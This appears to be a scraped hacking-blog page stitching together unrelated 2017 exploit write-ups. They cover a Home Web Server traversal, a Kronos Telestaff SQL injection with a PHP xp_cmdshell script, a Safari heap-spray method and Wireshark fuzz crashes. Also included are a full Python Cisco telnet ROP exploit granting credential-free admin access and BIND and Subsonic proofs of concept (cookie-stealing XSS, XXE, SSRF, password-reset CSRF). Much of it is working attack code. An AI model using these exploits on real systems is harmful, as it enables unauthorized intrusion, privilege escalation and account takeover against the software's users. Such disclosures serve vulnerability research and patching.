# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description :
-------------
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
it is possible to run any executable being on the remote host.
Instructions:
-------------
- Starts Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151846
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.
Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
compare timing with
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems
<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
$code=XXXX // insert valid code
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload=str_replace(" ","%20",$payload);
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);
function strToHex($string){
$hex = '';
for ($i=0; $i<strlen($string); $i++){
$ord = ord($string[$i]);
$hexCode = dechex($ord);
$hex .= substr('0'.$hexCode, -2);
}
return "0x".strToUpper($hex);
}
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
Solution
================
From Vendor:
Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
===========
www.isc.org
Product:
===========
BIND9
v9.10.5 x86 / x64
BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
at the University of California at Berkeley.
Vulnerability Type:
===================
Privilege Escalation
CVE Reference:
==============
CVE-2017-3141
Security Issue:
================
BIND installs as a service with an unquoted service path, to exploit a local attacker must place
a malicious executable file named "Program.exe" in the path of the service, if the process runs under
some account other than the attackers it can be used to exec code under a different set of privileges.
C:\>sc qc named
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: named
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ISC BIND
DEPENDENCIES :
SERVICE_START_NAME : .\named
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: May 13, 2017
Vendor confirm: May 14, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
======================
CSRF - Persistent XSS
CVE Reference:
==============
CVE-2017-9414
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
Then visit http://localhost:4040/index.view
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
Misc Reflected:
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
====================
XML External Entity
CVE Reference:
==============
CVE-2017-9355
Security Issue:
================
subsonic import playlist feature is succeptible to XML External Entity attack. To exploit a User must be tricked to
import a malicious .XSPF playlist file. The XXE injection can be used to target various hosts from the internal network
to bypass Firewall or from the internet as XML External Entity is related to Server Side Request Forgery (SSRF) attacks.
Exploit/POC:
=============
1) Create some playlist file "RainbowsNUnic0rns.xspf"
<?xml version="1.0"?>
<!DOCTYPE mmmmmRaisins [
<!ENTITY % mmmm SYSTEM "http://127.0.0.1:1337/">
%mmmm;]>
2) Import as playlist.
3) Start listener.
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
==================================
CSRF - Server Side Request Forgery
CVE Reference:
==============
CVE-2017-9413
Security Issue:
================
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
bypass Firewall restriction on LAN.
e.g
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
1) Subscribe to Podcast CSRF Persistent SSRF
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
nc.exe -llvp 5555
listening on [any] 5555 ...
2) Interet Radio Settings CSRF Persistent SSRF
<form action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input name="urlRedirectType" type="radio" value="NORMAL"/>
<input name="urlRedirectFrom" type="radio" value="yourname"/>
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
=====================
CSRF - Password Reset
CVE Reference:
==============
CVE-2017-9415
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, username must be known or guessed.
Exploit/POC:
=============
<form action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username" value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input name="password" type="hidden" value="xyz123"/>
<input name="confirmPassword" type="hidden" value="xyz123"/>
<input name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
#[+] Title: Parallels Desktop - Virtual Machine Escape
#[+] Product: Parallels
#[+] Vendor: http://www.parallels.com/products/desktop/
#[+] Affected Versions: All Version
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
